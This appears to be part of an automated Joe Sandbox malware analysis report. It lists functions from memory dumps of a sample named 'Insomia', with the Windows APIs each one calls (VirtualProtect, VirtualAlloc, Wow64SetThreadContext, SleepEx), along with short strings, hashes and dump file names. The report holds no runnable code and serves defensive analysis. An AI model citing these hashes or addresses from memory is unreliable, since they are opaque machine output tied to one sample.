Opcode ID: 90bbfbd6dae433d109f6806317357bb4bba0b20d6a4ef5867372d8fd24f57eda
Instruction ID: 5c3b271854288f075216673732d48c7ef0ad153781e61bf97467adbaa28418c0
Opcode Fuzzy Hash: 90bbfbd6dae433d109f6806317357bb4bba0b20d6a4ef5867372d8fd24f57eda
Instruction Fuzzy Hash: CA31CCB4D002589FCF10CFAAD584AEEFBB1BF09310F10942AE955B7210D735A945CF54

Function 05EF987D Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05EF9924

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7ebf37eb83d93402d2311ad69bb0fdfbb3ec972b4dc6f14e95dcff5900fb70af
Instruction ID: 4a5d35fad580faf881e6470e911ee52b5685e1a83b14e9990cf2beb6bef91583
Opcode Fuzzy Hash: 7ebf37eb83d93402d2311ad69bb0fdfbb3ec972b4dc6f14e95dcff5900fb70af
Instruction Fuzzy Hash: A431AAB9D002589FCF10CFA9D584AEEFBB1BF09310F24A42AE955B7210D739A945CF64

Function 060BDC48 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 060BDCEC

Memory Dump Source

Source File: 00000000.00000002.2131480600.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_Insomia.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 55b5e250b712116fe037fefd483694b5e9160cbd891785a5a715e47ef255403e
Instruction ID: 64d514d0d42125eea463f45e3195b3e000108b946bda5f1f241c8fa39afd8d8d
Opcode Fuzzy Hash: 55b5e250b712116fe037fefd483694b5e9160cbd891785a5a715e47ef255403e
Instruction Fuzzy Hash: 59319AB4D012589FCB10CFA9D984ADEFBB5BF49310F20942AE815B7214D735A945CF94

Function 05EFFCB8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05EFFD67

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4b95a2812f8379087ab63c47a86e022d5a2a0c902f18010ec21b36be2482a503
Instruction ID: 91b10d99386054802ea4dcf21669ef6495d2f94dedcafdf622baa72a495d5454
Opcode Fuzzy Hash: 4b95a2812f8379087ab63c47a86e022d5a2a0c902f18010ec21b36be2482a503
Instruction Fuzzy Hash: 2B31CDB4D002589FCB10DFAAD984AEEFBF1BF49314F24902AE419B7240D739A945CF94

Function 05EF80E8 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(?,?), ref: 05EF8182

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 46f793e7351481be35621f2dc05266fff011b94b5e53252e06fe4ac02cd88fb5
Instruction ID: 2345219cecfe06362fed16333c831a416329c583ce7ce1df67ee2e7373768cc6
Opcode Fuzzy Hash: 46f793e7351481be35621f2dc05266fff011b94b5e53252e06fe4ac02cd88fb5
Instruction Fuzzy Hash: EF31CDB4D052589FCB10CFA9D981ADEFBF5FB49310F14942AE905B7240D738A945CFA4

Function 05EF80F0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(?,?), ref: 05EF8182

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8dfbc3499694a4d2ea1d778331fcfd271234bf5754ba127dfa6017e177bf0eff
Instruction ID: 203f20a3ff8deac241c4d4c8a50dde7c5f6c066a8e0819399e6234e090fa4379
Opcode Fuzzy Hash: 8dfbc3499694a4d2ea1d778331fcfd271234bf5754ba127dfa6017e177bf0eff
Instruction Fuzzy Hash: 4731DDB4D052189FCB10CFA9D980AEEFBF5BF49310F14942AE405B7200DB38A945CFA4

Function 05EE2C08 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

TJbq, xrefs: 05EE2D07

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: TJbq
API String ID: 0-1760495472
Opcode ID: 3b0a0bfab2064042c4c5b2dfb15dd5ba58bf444827716632b3c48d1c4586271c
Instruction ID: 3ec96b363722b9a051f25179dd949efb01a9c05610e6a89ec3fd141e5f574b46
Opcode Fuzzy Hash: 3b0a0bfab2064042c4c5b2dfb15dd5ba58bf444827716632b3c48d1c4586271c
Instruction Fuzzy Hash: C861D378E05208DFCB04DFE8D9846AEBBB6FF88304F208129E506A7358DB345905CBA1

Function 05EE2BF9 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

TJbq, xrefs: 05EE2D07

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: TJbq
API String ID: 0-1760495472
Opcode ID: 1aed41dd9599ef2862b83e05702669fc6d1826241f3aa5c14322a4343d435d90
Instruction ID: 6fa595c70a15a16b5b2faabca6346125c3146cd853a4d9a85808f4f0083ab3ae
Opcode Fuzzy Hash: 1aed41dd9599ef2862b83e05702669fc6d1826241f3aa5c14322a4343d435d90
Instruction Fuzzy Hash: CB61C578E15208DFDB04DFE8D58469EBBB6FF88304F208129E506A7398DB345D05CBA1

Function 060C9A3B Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: 418deb837abb91bb643a0d11472790fc478bf673c1db436f7eeb460d01b56dfa
Instruction ID: 6359de0fa398a8209c9c070cb8cc529a573cf71eebb9f0f308e4aae3b3aade26
Opcode Fuzzy Hash: 418deb837abb91bb643a0d11472790fc478bf673c1db436f7eeb460d01b56dfa
Instruction Fuzzy Hash: 5F611574A45209CFDB94DFA8C884BAEBBF1FB48310F508069D40AAB394DB746D85CF91

Function 060C9AC4 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: 789d1042624a41a2a027e44960a9afc56c7f89fa6c7f1042ba80b17f9c1bcd01
Instruction ID: 2a63c5433e77c30f4bca08f5581103687cbce9f8a2ed79b4e178060ecdc3d46d
Opcode Fuzzy Hash: 789d1042624a41a2a027e44960a9afc56c7f89fa6c7f1042ba80b17f9c1bcd01
Instruction Fuzzy Hash: 58610670A45209CFDB94DFA8C884BEDBBF1FB49310F508069D40AAB294DB346D85CF91

Function 05E9F860 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

,aq, xrefs: 05E9F8C3

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: ,aq
API String ID: 0-3092978723
Opcode ID: e66bc6ae73184a6495fb5d6cf86209e5a5f480c2e2c5d50068b36d1fbc219ca1
Instruction ID: 7490f12036fa51716f7928fa2edae83c1f1a44dcbefea1f2bcdfeaddd11e168b
Opcode Fuzzy Hash: e66bc6ae73184a6495fb5d6cf86209e5a5f480c2e2c5d50068b36d1fbc219ca1
Instruction Fuzzy Hash: 3651AF357001119FCB05DFA9D850A6EBBF6FF89321B21816AE916DB365DB31EC02CB91

Function 05E9D9C8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

paq, xrefs: 05E9DA78

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: paq
API String ID: 0-3273118895
Opcode ID: ce699db7257e9c1dcbf42b192feb159ab582a2f49ed538f9c69112b5c148d8c8
Instruction ID: fd55586d04dc4d2d2a14429a8deabda39a5c802e19dbf7616645afaac54e9829
Opcode Fuzzy Hash: ce699db7257e9c1dcbf42b192feb159ab582a2f49ed538f9c69112b5c148d8c8
Instruction Fuzzy Hash: 67516D76600100AFCB499FA8CD04D69BBB7FF8C31071A84D8E2099B372DA36DC21EB50

Function 060C9D08 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: eebedd1759f68b41419092f818a3ba5519cea7e92cceae5bd2d647d3bf57f07d
Instruction ID: 92dd372dc9a621180544ac7bc13a6f4d67fabaa625271a747a7c8837fb7cc872
Opcode Fuzzy Hash: eebedd1759f68b41419092f818a3ba5519cea7e92cceae5bd2d647d3bf57f07d
Instruction Fuzzy Hash: 3461E574A45209CFDB94DF98D884BEEBBF1FB48310F508069D40AAB294DB746D85CF91

Function 016D8A90 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

z=q^, xrefs: 016D8B71

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: z=q^
API String ID: 0-3011698019
Opcode ID: eceab9936596fe112537a72082e44fcc91f27d4f203afdcec42181265246cd03
Instruction ID: 5077155f4d3bfe73c20b721f84c0145f4b8b279f9cc4efab78fbb6377c0afd37
Opcode Fuzzy Hash: eceab9936596fe112537a72082e44fcc91f27d4f203afdcec42181265246cd03
Instruction Fuzzy Hash: 2151EFF5C08344EFEB01ABB8DC897AD7FB5EF86301F159496C04197282DB344946CBA1

Function 060C8C9A Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 060C8D50

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 120f99accf94f1f09e24bde471eeaac680d937638de3c114c493af3b0fad043d
Instruction ID: 03042f43241d9cb6920141c7861d7b4b110506b095a5132ab7387f2256b02911
Opcode Fuzzy Hash: 120f99accf94f1f09e24bde471eeaac680d937638de3c114c493af3b0fad043d
Instruction Fuzzy Hash: 89717A74A05228CFDB64DF64DD94B9EBBB2BB49300F5081DAE50AA7384EB305E81CF51

Function 060C9B05 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: c1ca092871529e32736832483b5f43c8ee810ebfffce32cdf608974024353b20
Instruction ID: 566e62c65a499917b9bcd0d7480eb37167af5f3534b7200038841dfde159fafa
Opcode Fuzzy Hash: c1ca092871529e32736832483b5f43c8ee810ebfffce32cdf608974024353b20
Instruction Fuzzy Hash: B5510574A45209CFDB94DFA8D884BAEBBF1FB48310F508069D50AAB394DB346D85CF91

Function 060C99C2 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: 2f4c1374fdccbb26a316e05476cd6bc629e53632654534e8b942547724a3da96
Instruction ID: ecb7ada1f815f78e5fb4569dffc5f9fc2b11b70eb576294eba6b8e1280e75e1c
Opcode Fuzzy Hash: 2f4c1374fdccbb26a316e05476cd6bc629e53632654534e8b942547724a3da96
Instruction Fuzzy Hash: C0512574A45208CFDB94DFA8D884BAEBBF1FB48310F508069D00AAB294DB346D85CF90

Function 05EEFEB8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

(aq, xrefs: 05EEFF88

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 73925ccc235a24dca8c59a1de64f2993060f05da65bf42fea96ebbec831a59b3
Instruction ID: 848c0b45df247379191eb12f25198a08621ea30eedcf76eb01574f4fb65df10a
Opcode Fuzzy Hash: 73925ccc235a24dca8c59a1de64f2993060f05da65bf42fea96ebbec831a59b3
Instruction Fuzzy Hash: 7731A235B047158FC7289F6D945056EBBF2FBC9314B50892DE96AD3740CB30A802CB81

Function 05E9D9C4 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

paq, xrefs: 05E9DA78

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: paq
API String ID: 0-3273118895
Opcode ID: 60bfe298aa03d0fafd36e6722a30a60bf996c41f3be3788db9cbe8e46633dd41
Instruction ID: f93e62e4241745ccca31d75f8287919a7a0967f203a3c9cf84c90b83ea198296
Opcode Fuzzy Hash: 60bfe298aa03d0fafd36e6722a30a60bf996c41f3be3788db9cbe8e46633dd41
Instruction Fuzzy Hash: 82411976600100AFCB4A9FA8DD44D597BF7FF8C32471A8598E2099B376DA32DC21EB51

Function 05E9E9E4 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(aq, xrefs: 05E9E9FC

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 9597c89d4e37e45788c035e3452a69e86e2dd6f388c12965f5c538eaad11bab3
Instruction ID: 011bd8c8aab44f323c480a22841e08cb3c5b4054476cc70b704cc2c7ea2ff105
Opcode Fuzzy Hash: 9597c89d4e37e45788c035e3452a69e86e2dd6f388c12965f5c538eaad11bab3
Instruction Fuzzy Hash: 6641FE30E002168FCF04DF28C48497AFBB5FF49324B158699D5A59B3A2D730F845CB91

Function 016D12DF Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

paq, xrefs: 016D132C

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: paq
API String ID: 0-3273118895
Opcode ID: aaaad54bca123d1a945ef9ec27d034d0fedd2d81399dac0faca5ab261a7c8747
Instruction ID: a8a4ab9ac4ce24dba136eb7c6403ff1d654ae7aad63a92c3c5d7b47362fb55c9
Opcode Fuzzy Hash: aaaad54bca123d1a945ef9ec27d034d0fedd2d81399dac0faca5ab261a7c8747
Instruction Fuzzy Hash: 05311776A00105EFDB068F94DD44E6ABBB3FF89310F068095F6059B276CA72DC62DB51

Function 060BED80 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 060BEE1F

Memory Dump Source

Source File: 00000000.00000002.2131480600.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_Insomia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 24254ed0eb269aa1280912b6d798afd79ff55a467971f7b36406f61632d3d880
Instruction ID: dc7fc4f438a97cd09d3115d8f3183475e97ec0b44095b304b66a3c14eaff2a48
Opcode Fuzzy Hash: 24254ed0eb269aa1280912b6d798afd79ff55a467971f7b36406f61632d3d880
Instruction Fuzzy Hash: 303199B8D012589FCF10CFA9D984ADEFBB5BF59310F20942AE815B7210D735A945CF94

Function 060C6278 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

ibn0, xrefs: 060C62CE

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: ibn0
API String ID: 0-4053667422
Opcode ID: 53f73812c26ef635b3944ade78fbf915aa46e68cae15ce7709b9254b81d832eb
Instruction ID: 040fa975977db4f3d890ded76ed42e4c8d4a28f2ea3f427b279e6495b53b30f1
Opcode Fuzzy Hash: 53f73812c26ef635b3944ade78fbf915aa46e68cae15ce7709b9254b81d832eb
Instruction Fuzzy Hash: 28312975E012099FCB09DFA9D9506EEBBF2FF88210F10846AE406BB364DB359945CB91

Function 016D0F91 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

<dtq, xrefs: 016D100E

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: <dtq
API String ID: 0-3090548385
Opcode ID: 859d947283f7b9b320b156654138998c29e6f4b5f06f1286efd0146d7783fa7a
Instruction ID: 699eb7501056664bb1b2f5ed8c4602aefa1e2fdfd94c36f0afd971092852c51b
Opcode Fuzzy Hash: 859d947283f7b9b320b156654138998c29e6f4b5f06f1286efd0146d7783fa7a
Instruction Fuzzy Hash: 2501266874A3806FC31607785C5846E3FE3EFCA2113195196E84BC739ADE2C4C138722

Function 05E9F85C Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

,aq, xrefs: 05E9F8C3

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: ,aq
API String ID: 0-3092978723
Opcode ID: 26fca952e086a283827cdd79285282521aeedc69489a106c619a44d992b32900
Instruction ID: 88628787fdad2efd3ff00242c64915a46ebf3b59c5ca0a5232576c6a26f81f6e
Opcode Fuzzy Hash: 26fca952e086a283827cdd79285282521aeedc69489a106c619a44d992b32900
Instruction Fuzzy Hash: F4115B34B001069FDB04DFB9C85496EBBB6EF85301B218069E945DB364DB71EC41CB90

Function 05EE7EB5 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

z, xrefs: 05EE9B85

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: z
API String ID: 0-1657960367
Opcode ID: 76017c3cdd306b35832c3b98a485448e6265c8bf452d1c94b08a2ea1617c450c
Instruction ID: c183939330985f51407dbf727e3d7a0962e86bf26d222e8acf1f63b7d5042320
Opcode Fuzzy Hash: 76017c3cdd306b35832c3b98a485448e6265c8bf452d1c94b08a2ea1617c450c
Instruction Fuzzy Hash: 7821CE74A21268CFDB24DF64D884BADBBB6FB48304F4095AAD44AB3254DB745E80CF10

Function 06324B8A Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

S, xrefs: 06329738

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID: S
API String ID: 0-543223747
Opcode ID: 8155028d10bafd454a3a873c6e29c78450af2dfcf2354ad6fa63032599cf7253
Instruction ID: 0dce3177377a4efaca16217dc8fea0b22acb12137f29eed210027066e6387b33
Opcode Fuzzy Hash: 8155028d10bafd454a3a873c6e29c78450af2dfcf2354ad6fa63032599cf7253
Instruction Fuzzy Hash: 78210778E0522ECFDBA4CF14D988BAAB7B1EB88344F1040E9D409A3644DB755ED8DF91

Function 060C191E Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

}, xrefs: 060C19C8

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: }
API String ID: 0-4239843852
Opcode ID: 1d7d85a56447c76d2c4de050ffa8477009beff7d7546e87904682165ea8a121b
Instruction ID: cbfec8b562dc4edba8f092d69e4fe75d5ded13aab618cbbf75ce632993053ef5
Opcode Fuzzy Hash: 1d7d85a56447c76d2c4de050ffa8477009beff7d7546e87904682165ea8a121b
Instruction Fuzzy Hash: CD11B3B4A14128CFDB60DF74CC94A99BBB1AF59300F4082EAD58EA7250EB315E85CF59

Function 016D0FC0 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

<dtq, xrefs: 016D100E

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID: <dtq
API String ID: 0-3090548385
Opcode ID: bfaeff7ba6280d270be2001c137f269d7035f4d6ea3a51d26620780726d96243
Instruction ID: ae3b8c5f6d5cd2b6ee85ed22a93e4e021d11295214ac0eb7ca933e02716aea6b
Opcode Fuzzy Hash: bfaeff7ba6280d270be2001c137f269d7035f4d6ea3a51d26620780726d96243
Instruction Fuzzy Hash: 5FF05479B402046FC7546B79AC5C43E7BE7FBC82523105524E807C334CEE388C128B62

Function 060C4A28 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

%, xrefs: 060C4A32

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 679ee7eb8008aceb3893fd3cd84c799a90347bd8b9beeedf78439f997ee4c1d0
Instruction ID: be48564dcdf9881d32eff5e952c967b273b84372bf452b8e2abcfc57aef6e12d
Opcode Fuzzy Hash: 679ee7eb8008aceb3893fd3cd84c799a90347bd8b9beeedf78439f997ee4c1d0
Instruction Fuzzy Hash: AE11C5B4E41268CFEBA08F58DC4879DBBB4FF4531AF0044D9954AA7252CB741AC4CF2A

Function 01B400C0 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

8aq, xrefs: 01B400E7

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: 4ba5e8b15bdeeb82e64afdf16f855b73d125b863c17414c02c82301588408fe7
Instruction ID: a5a15140030eb76dcd0a2eff5a0e890b42df610f44cd3ac5f51e8e9a365c3f1c
Opcode Fuzzy Hash: 4ba5e8b15bdeeb82e64afdf16f855b73d125b863c17414c02c82301588408fe7
Instruction Fuzzy Hash: C4E09A1128D7D01FC31757792C600A5FBB5EF83214B2A44FFD085CB2A3D91A8C0A83A6

Function 05E9AB77 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05E9ABA6

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 8ed44c8cd18467a863e8e991c496daf3e7f465f11cc05a69307e7be4abfd8925
Instruction ID: 998c13eb453fd40c12d8443946e516a5218b559771ad542e625e6afa47fe46db
Opcode Fuzzy Hash: 8ed44c8cd18467a863e8e991c496daf3e7f465f11cc05a69307e7be4abfd8925
Instruction Fuzzy Hash: 8AF0D478A00299CFCB24DF68D891BCDB7B2BB49340F5084AA844AB7344D6705E81CF61

Function 060C72B3 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

TJbq, xrefs: 060C72E2

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: TJbq
API String ID: 0-1760495472
Opcode ID: 2a17fbecced600390cfa0eb1e3021592a09198cae7c432664d82eaf6de524814
Instruction ID: 80dd1b2b23c832252796b3214809664118a5779fa5cbc5e6ea90f60cf45dcfaf
Opcode Fuzzy Hash: 2a17fbecced600390cfa0eb1e3021592a09198cae7c432664d82eaf6de524814
Instruction Fuzzy Hash: F8F07F78A0422CCFDB24DF64C954B9EBBB2FF8A300F6041998549A7388DB705E81DF56

Function 06324EB0 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

7, xrefs: 06324EEF

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 12cd5b160334b133b8e5fda9b74ce79ab78ba6751210d461f2cda8d8470dcc19
Instruction ID: 3802c3c9c4e5c43f61e5b64dd7844e81bdfab8b7d15c7a66d7e0db8dac9eb0e6
Opcode Fuzzy Hash: 12cd5b160334b133b8e5fda9b74ce79ab78ba6751210d461f2cda8d8470dcc19
Instruction Fuzzy Hash: 7AE02630501106CFD3059BA4D80CA9B7BA1FF00308F1040E8E00A57686CFB60D58DF61

Function 016D718D Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
